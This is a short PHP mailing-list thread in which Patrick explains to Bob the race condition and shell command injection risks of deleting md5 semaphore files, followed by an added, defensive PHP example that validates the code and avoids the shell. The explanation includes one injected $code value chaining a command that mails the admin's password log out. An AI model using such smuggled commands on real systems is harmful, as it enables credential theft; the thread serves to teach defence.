Hi Patrick,

I'm enlightened, thanks for your help.

Regards, Bob.

----- Original Message -----
From: "Patrick Bierans" <[EMAIL PROTECTED]>

> What if one enters the page, generates his md5-file and before he enters
> the form another prepares his own md5-file. Are you deleting every existing
> file? In this case the first person will lose his md5-file. That's why you
> will need a time based garbage collection.
>
> Let's say $code='2342864238724'. This will execute the following shell
> command:
>
> unlink /tmp/2342864238724.semaphore
>
> And now somebody gets evil: Let's say $code='2342864238724.semaphore &&
> /usr/root/pass.log > sendmail [EMAIL PROTECTED] --subject="got_it!"
> "got_it!" && echo'
>
> what will happen if you do not filter $code for "evil" chars?
>
> unlink /tmp/2342864238724.semaphore && /usr/root/pass.log >
> sendmail [EMAIL PROTECTED] --subject="got_it!" && echo .semaphore
>
> translated: "delete a file and send me the password logfile from the admin"
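An added example, not part of the original thread: one way to handle the two points Patrick raises (filtering `$code` and time-based garbage collection), assuming the application only ever issues all-digit codes like his sample value. The function names, the `SEMAPHORE_DIR` constant and the 15-minute lifetime are hypothetical.

```php
<?php
// Added example. SEMAPHORE_DIR, the function names and the 900 s lifetime are assumptions.
const SEMAPHORE_DIR = '/tmp';

/** Return the semaphore path for $code, or null if $code is not purely digits. */
function semaphore_path(string $code): ?string
{
    // Allow-list: 1 to 32 ASCII digits only. \z (not $) also rejects a trailing newline.
    if (preg_match('/\A[0-9]{1,32}\z/', $code) !== 1) {
        return null;
    }
    return SEMAPHORE_DIR . '/' . $code . '.semaphore';
}

/** Delete one semaphore file without involving a shell. */
function remove_semaphore(string $code): bool
{
    $path = semaphore_path($code);
    if ($path === null) {
        // Log the rejected value hex-encoded so it cannot forge log lines.
        error_log('rejected semaphore code: ' . bin2hex(substr($code, 0, 64)));
        return false;
    }
    // PHP's own unlink() hands the path to the OS directly; no shell ever parses it.
    return is_file($path) && unlink($path);
}

/** Time-based garbage collection: drop semaphores older than $maxAge seconds. */
function collect_garbage(int $maxAge = 900): int
{
    $removed = 0;
    foreach (glob(SEMAPHORE_DIR . '/*.semaphore') ?: [] as $file) {
        $mtime = filemtime($file);
        if ($mtime !== false && time() - $mtime > $maxAge && @unlink($file)) {
            $removed++;
        }
    }
    return $removed;
}

// Constructed sample inputs: one well-formed code, one carrying shell metacharacters.
foreach (['2342864238724', '2342864238724.semaphore && echo'] as $code) {
    printf("%s => %s\n", json_encode($code), var_export(semaphore_path($code), true));
}
```

If a shell command cannot be avoided, the validated value should still be passed through `escapeshellarg()` before it is concatenated into the command string.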
